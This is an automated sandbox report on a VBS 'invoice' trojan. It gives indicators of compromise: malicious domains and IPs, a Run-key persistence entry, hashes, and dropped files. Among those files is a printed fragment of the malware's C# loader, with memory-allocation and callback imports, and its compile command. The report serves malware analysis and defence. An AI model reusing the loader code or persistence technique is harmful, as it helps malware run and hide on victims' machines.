                                                                                    https://api.msn.com/explorer.exe, 0000001C.00000000.2213138685.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1798471392.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1728052309.0000000009702000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1876265069.0000000009702000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-rchkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woffchkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://windows.msn.com:443/shellexplorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGaexplorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://go.microsoft.cepowershell.exe, 0000000D.00000002.1778313502.000000000311C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://i3.cdn-image.com/__media__/js/min.js?v2.3chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://www.linqxw.com/display.cfmchkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://hg.mozilla.org/releases/mozilla-release/rev/7dafd5f51c0afd1ae627bb4762ac0c140a6cd5f5chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://barsam.com.au/ieinstal.exe, 0000001B.00000002.1969523005.0000000003384000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://www.msn.com:443/en-us/feedexplorer.exe, 0000001C.00000000.1723255332.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1871183949.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2207706547.000000000529C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1792758261.000000000529C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://mozilla.org0chkdsk.exe, 00000020.00000003.2374725822.0000000007881000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://doma813348.china.myorderbox.com/linkhandler/servlet/RenewDomainServlet?validatenow=false&amp;chkdsk.exe, 00000020.00000002.5742418303.00000000059EF000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://purlorg/dc/elements/1.1/explorer.exe, 0000001C.00000000.2202119601.00000000046E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1865992376.00000000046E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1718861114.00000000046E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1787443829.00000000046E2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                low
                                                                                                https://aka.ms/pscore6lB2lpowershell.exe, 0000000D.00000002.1783849096.0000000005091000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  • No. of IPs < 25%
                                                                                                  • 25% < No. of IPs < 50%
                                                                                                  • 50% < No. of IPs < 75%
                                                                                                  • 75% < No. of IPs
                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                  68.65.122.211
                                                                                                  schnellekreditfinanz.comUnited States
                                                                                                  22612NAMECHEAP-NETUStrue
                                                                                                  217.160.0.18
                                                                                                  www.borneadomicile.comGermany
                                                                                                  8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                  209.99.40.222
                                                                                                  www.linqxw.comUnited States
                                                                                                  40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                  199.192.29.215
                                                                                                  www.getsuzamtir.xyzUnited States
                                                                                                  22612NAMECHEAP-NETUStrue
                                                                                                  198.23.49.173
                                                                                                  www.clickleaser.comUnited States
                                                                                                  32748STEADFASTUStrue
                                                                                                  180.76.247.231
                                                                                                  www.dujh.xyzChina
                                                                                                  38365BAIDUBeijingBaiduNetcomScienceandTechnologyCoLtdtrue
                                                                                                  185.53.179.171
                                                                                                  www.repaircilinic.comGermany
                                                                                                  61969TEAMINTERNET-ASDEtrue
                                                                                                  203.170.86.89
                                                                                                  barsam.com.auAustralia
                                                                                                  38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue
                                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                  Analysis ID:623396
                                                                                                  Start date and time: 10/05/202214:19:082022-05-10 14:19:08 +02:00
                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                  Overall analysis duration:0h 19m 15s
                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                  Report type:light
                                                                                                  Sample file name:WWVN_INVOICE_8363567453.vbs
                                                                                                  Cookbook file name:default.jbs
                                                                                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                  Run name:Suspected Instruction Hammering
                                                                                                  Number of analysed new started processes analysed:41
                                                                                                  Number of new started drivers analysed:0
                                                                                                  Number of existing processes analysed:0
                                                                                                  Number of existing drivers analysed:0
                                                                                                  Number of injected processes analysed:1
                                                                                                  Technologies:
                                                                                                  • HCA enabled
                                                                                                  • EGA enabled
                                                                                                  • HDC enabled
                                                                                                  • AMSI enabled
                                                                                                  Analysis Mode:default
                                                                                                  Analysis stop reason:Timeout
                                                                                                  Detection:MAL
                                                                                                  Classification:mal100.troj.spyw.evad.winVBS@22/16@21/8
                                                                                                  EGA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  HDC Information:
                                                                                                  • Successful, ratio: 85% (good quality ratio 76.9%)
                                                                                                  • Quality average: 73.8%
                                                                                                  • Quality standard deviation: 31.3%
                                                                                                  HCA Information:
                                                                                                  • Successful, ratio: 100%
                                                                                                  • Number of executed functions: 0
                                                                                                  • Number of non-executed functions: 0
                                                                                                  Cookbook Comments:
                                                                                                  • Found application associated with file extension: .vbs
                                                                                                  • Adjust boot time
                                                                                                  • Enable AMSI
                                                                                                  • Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, MusNotificationUx.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, svchost.exe
                                                                                                  • TCP Packets have been reduced to 100
                                                                                                  • Excluded IPs from analysis (whitelisted): 40.117.96.136, 51.124.57.242, 20.93.58.141
                                                                                                  • Excluded domains from analysis (whitelisted): www.bing.com, wd-prod-cp-eu-north-3-fe.northeurope.cloudapp.azure.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, login.live.com, apimgmttmr17ij3jt5dneg64srod9jevcuajxaoube4brtu9cq.trafficmanager.net, evoke-windowsservices-tas.msedge.net, apimgmthszbjimgeglorvthkncixvpso9vnynvh3ehmsdll33a.cloudapp.net, img-prod-cms-rt-microsoft-com.akamaized.net, nexusrules.officeapps.live.com, manage.devcenter.microsoft.com, wd-prod-cp-eu-west-3-fe.westeurope.cloudapp.azure.com
                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                  TimeTypeDescription
                                                                                                  14:22:17API Interceptor37x Sleep call for process: powershell.exe modified
                                                                                                  14:23:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LJO0FHTXHPX C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                  14:23:36AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LJO0FHTXHPX C:\Program Files (x86)\internet explorer\ieinstal.exe
                                                                                                  No context
                                                                                                  No context
                                                                                                  No context
                                                                                                  No context
                                                                                                  No context
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:data
                                                                                                  Category:modified
                                                                                                  Size (bytes):5829
                                                                                                  Entropy (8bit):4.901739309084484
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:96:7sCJ2Woe5wv2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXz9smqFRLcu:Pxoe5GVsm5emdsgkjDt4iWN3yBGHD9sj
                                                                                                  MD5:282A064FB3F0E58EC10467E027EA203A
                                                                                                  SHA1:B5DCBF5AE67C4B57BA74CA9F614CFB2341F2E62A
                                                                                                  SHA-256:86E625B4810E5358AD45B8D99BAB9F94671D39F1424F6E66F1B0661E73E4074F
                                                                                                  SHA-512:984F355177D075808049E713A5DFCC12A742CBEF8F3499201C3798EF7A156F8A80A71BB589400D3AFBD5DEDEC4FA0EFD66148F02FAEB2881298D4529F659EF3F
                                                                                                  Malicious:false
                                                                                                  Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3036000
                                                                                                  Category:dropped
                                                                                                  Size (bytes):45056
                                                                                                  Entropy (8bit):0.7853305971874845
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:43b/DVIIgyZKLk8s8LKvUf9K4UKTgyJqhtcebVEq8Ma0D0HOlcjlGxdKmtAONu41:Sb+uKLyeym/grcebn8MouOjlGxdKmt3N
                                                                                                  MD5:00C036C61F625BF9D25362B9BE24ADEB
                                                                                                  SHA1:6738C3D037E4A2E9F41B1398BA88E5771532F593
                                                                                                  SHA-256:0C187B091E99E5BB665C59F8F8E027D5658904B32E4196D2EB402F3B1CAD69EF
                                                                                                  SHA-512:711265BC8C1653BF6E862343BF3149A2AB09F4BA7D38E2D8A437001DB6C0F1936F6362571DD577CD7BDBEEC766DF141CB7E0681512C12E25A99CDB71731232D1
                                                                                                  Malicious:false
                                                                                                  Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                                  File Type:data
                                                                                                  Category:dropped
                                                                                                  Size (bytes):58767
                                                                                                  Entropy (8bit):7.381111578760272
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:768:kxehGKqGiOPsqHEA4l7UTJXGJOVFmP2c/7aD+PJL/k2N2788T8NhBrs:kxlK/iOPsmV7J2JCFDZyP1/krQPNfo
                                                                                                  MD5:7F53C5BDB8BE10B4244A89D5B4580B53
                                                                                                  SHA1:A2A3BF3829D0311E3BCC981D98B7FEE88B830055
                                                                                                  SHA-256:13ACE3214FB2EB0AA56526DBEE9510E1ED2B1F1D051D9FAB5FDC7D01DFE964F5
                                                                                                  SHA-512:72FE63679C4522FC5B55D6B593FEDFC0A4025DE6573AF154D86E74352260966B4F2F1C7A389372C04E1846C800BA9A3029D466E72C9BB70E963140C8AA9B287F
                                                                                                  Malicious:false
                                                                                                  Preview:......h:....4$.....4$yY.,Z.._1..4.5|..@@@@9.u.W.........5Yy.Zf.^.`.O;.C.+...0.),........c@......l ...^.>...QG7....N...[...ZRjx....v..x_.=..J.n.....T.jcli..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c....M..../dX.).I..uE_ba.uyB/....Q.R....e..c.f...i/.._8~.8....[.I.".5.G...`X.T.1&...V...~...(d..h+.3.A..Ri#.j.c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c....hS.B...P.IX.....k.......n.~.....p.64...I@.0..5|..5EX....:.|..5...p8.V..~.qDoo........q.......=...uEy....]..h..|.....14|....[.O..i..:v...ur.d[...E.a.g..14|.o;...9.......=.|'ik.|......1.=d..~.5.5..O5|....;Y5|.]m.A.....5.C......}.._}.i~2.|...X.5..=.5.~...=....._......!......L.....O.&.5...4|.<......s..MI.ir.L.j z.i..2@rg.O 6......:.....5|MF.....i.|.K.H*.@SO.1.?...i...c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..c..M^.5.t..xH/.....Z..(K.../|$
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols
                                                                                                  Category:dropped
                                                                                                  Size (bytes):1336
                                                                                                  Entropy (8bit):4.001812497434292
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:Hkjm90czyal1HowKTFpmfwI+ycuZhNShakSDGPNnqSSd:YWl1XKTzmo1ulSha3D6qSC
                                                                                                  MD5:E3D27E890889DDA457BCC0F52E5EAFBC
                                                                                                  SHA1:EC22E4BCDC209BA7ED67438ED0D9B383D7D012ED
                                                                                                  SHA-256:DA6BB5EA7F885158076A1675A1E3C1F50CDAB0A369EE11A77C2FF7922479B58A
                                                                                                  SHA-512:4B436F4CCEB464354041B0D28F525B76A04B240E6C0181E472635229C2DFC1DA5B1E6B0EAC41CB6B8D5C1BA4CFCDDEEC4FA4FA650B3DA48188943BA588A540CD
                                                                                                  Malicious:false
                                                                                                  Preview:L....gzb.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\gkb1wfd4\CSC1FB6CDA7423C41F280B0C76B8C389BB7.TMP...................B.........v.............5.......C:\Users\user\AppData\Local\Temp\RES2E9C.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.k.b.1.w.f.d.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):60
                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                  Malicious:false
                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                  File Type:MSVC .res
                                                                                                  Category:dropped
                                                                                                  Size (bytes):652
                                                                                                  Entropy (8bit):3.1157260505480093
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryohak7YnqqDGPN5Dlq5J:+RI+ycuZhNShakSDGPNnqX
                                                                                                  MD5:1742F988CBD29701FFB91A8576CF1489
                                                                                                  SHA1:4F47DA1B8F51545EB0A880F85FFDB30FA5872A66
                                                                                                  SHA-256:F6CAFACBBAE7CC3A3CA7D60CD8B15B5AC6D33464BE90B29D1CB3DFBB33EB2732
                                                                                                  SHA-512:779D603CE8B95F7519B617157B02A18D9563DE2EE003F704A39179606612F69F3F1578AF3D2B277062926AF0741D212D73D13DF7511C713DC327D104C79489AD
                                                                                                  Malicious:false
                                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.k.b.1.w.f.d.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...g.k.b.1.w.f.d.4...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):882
                                                                                                  Entropy (8bit):5.226399550729973
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:Jo1SGv76URmgkr7nv76zLu+yNp2vHNKgs2qz6LgdaD:Jo1SGz6emhr7nz6zjyqVFUu
                                                                                                  MD5:EA505B82FAD07E00D99FD3C7A36FF79A
                                                                                                  SHA1:68B8F59916AFB004F83158D741B1C75E02F2E83B
                                                                                                  SHA-256:AC0F5F6D3627B4F5F33695E43875609817401A6BF61B88B7193600FCC07AD50A
                                                                                                  SHA-512:BF5CA9FF4B2B5F95A04901F20869E1AB2119A0A569CFF032E8048260A11FE7E87DCB9112A2E20632A830D95353D2CB810DC1571B0091D828FFFBB61DBDE6F0DD
                                                                                                  Malicious:false
                                                                                                  Preview:.using System;..using System.Runtime.InteropServices;..public static class chondroga1..{..[DllImport("gdi32")]public static extern IntPtr EnumFontsA(string Ructiou,uint Muskily7,int Debi7,int chondroga0,int Farmak,int Quinqueve,int SLGT);..[DllImport("KERNEL32", EntryPoint="CreateFileA")]public static extern IntPtr Viac([MarshalAs(UnmanagedType.LPStr)]string Ructiou,uint Muskily7,int Debi7,int chondroga0,int Farmak,int Quinqueve,int SLGT);..[DllImport("ntdll")]public static extern int NtAllocateVirtualMemory(int chondroga6,ref Int32 Clathra4,int Varedekla,ref Int32 chondroga,int Outhowling5,int chondroga7);..[DllImport("KERNEL32", EntryPoint="ReadFile")]public static extern int CDAC(int Varedekla0,uint Varedekla1,IntPtr Varedekla2,ref Int32 Varedekla3,int Varedekla4);..[DllImport("USER32")]public static extern IntPtr EnumWindows(IntPtr Varedekla5,int Varedekla6);....}
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):371
                                                                                                  Entropy (8bit):5.312320194781695
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23fBrLmzxs7+AEszICN23fBrL7n:p37Lvkmb6KmcWZE75
                                                                                                  MD5:3E0AC72E3391C76EE61B8064C6AF7A1C
                                                                                                  SHA1:FBC909C18C9530277C99A8143BF2C2218A460F2D
                                                                                                  SHA-256:182C7AD9D14F572F91D307A742F6729FFA9431C17BC87F629F7F6320B0116D1B
                                                                                                  SHA-512:282AC8780E407AB9141509853B92E80B30D7D799C03DE28F49C041638756B3B9DAE430E339ACB90728E625F4C2597B61F67EF05308C3F387F0647ADEB5EC4E74
                                                                                                  Malicious:false
                                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.0.cs"
                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):3584
                                                                                                  Entropy (8bit):3.2774962950991537
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:48:61HPW4BCJTLrL9Cz3K4j5SuJYFO1ulSha3D6q:8W3J/H9iSl4hKD
                                                                                                  MD5:6BB978469690727BC92CAE82866357B8
                                                                                                  SHA1:9EB04A42450F2FB98D9A8DB80AF028BE3BFF52AB
                                                                                                  SHA-256:E2BC9EED112AAE97F4A4E14C5C026A82AED7FA98F66F4788FACD17643FC443FF
                                                                                                  SHA-512:4EE79D6216D705074D2A420006E0CD7671C07C95149993AF01848954F4442CA499F14B60E6B6E21D2A9D5ABBC73F4CB63F9B6EC04BD152656B659CC8AE92BCE5
                                                                                                  Malicious:false
                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....gzb...........!.................%... ...@....... ....................................@.................................l%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H.......P ..............................................................BSJB............v4.0.30319......l.......#~..l...(...#Strings............#US.........#GUID.......p...#Blob...........G5........%3................................................................2.+.................|.....|.......................................... 9............ D............ I............ a.!.......... f.+.......r.....z................................ ..r.....z...............................
                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                                                                                  Category:modified
                                                                                                  Size (bytes):870
                                                                                                  Entropy (8bit):5.334228913964524
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:24:KSqd3ka6KmNE78Kax5DqBVKVrdFAMBJTH:dika6PNE78K2DcVKdBJj
                                                                                                  MD5:8DE9F174C3DC28200283098931B94E38
                                                                                                  SHA1:EAB4B875FF20C3CCBCEBBA47132DBF735784BF16
                                                                                                  SHA-256:0C93904F07F64A35E2ACBC7E5B0642E8E404494D480AD0D571B72A1DBB04D4C3
                                                                                                  SHA-512:F7CFD263952927913BC9BF7219937B442D1887901E00713D42A0836897C07D8EF704E4C2A9BCD5C29CB26CBAD269FCE9AAE78AA1FBBBB6F2D7EB236502D1E06D
                                                                                                  Malicious:false
                                                                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                  Process:C:\Windows\SysWOW64\chkdsk.exe
                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1920x1080, frames 3
                                                                                                  Category:dropped
                                                                                                  Size (bytes):127946
                                                                                                  Entropy (8bit):7.770343991302179
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:3072:cRhwWC2kSbjowaJn6QqR1ST5YeyLzHkSmGA+0LqUPJsJed:yE2kSwwa61eWD90mUP6Jed
                                                                                                  MD5:C0F165FAD0210E1085115696F28226DC
                                                                                                  SHA1:5887A72BE757A97B10B46A9D8B2F0029757E1E12
                                                                                                  SHA-256:CC0C4BB2C1EFD44DCD69E3B7D64CB717B04CDD69E1C1B6D74E8EAFC994ACCF23
                                                                                                  SHA-512:5A62311267950B8965E8FED8C74E752F5D7961451BEB6FF8514A30A411040F225DF85E602EF6B0AAB7EA3FE93739862277C6D25980A8DDCAE13DD7B05DBD6174
                                                                                                  Malicious:false
                                                                                                  Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......8...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?0.Z.oaqs......21....}.ZM:...[+J}#.G.y.+...p.....Mb.3(...l.......;g.$~.....m.....~....8.r.CY.+Gm}.j*..wj7M.*.|r...WJ...g..(.IX(..b..^i(...=?.o...~......<.....V..y.....A.....e.f..f.zK..Z.I...R..X.......g.b?......=oI..K.?...}.6.$c...p....S.Q.....9V3.O.V......E-...p.QE..QW.[X...;Y..#`...T...7.W4.M..q......O[...?.........?.......g...b..?{..#.A..k.|
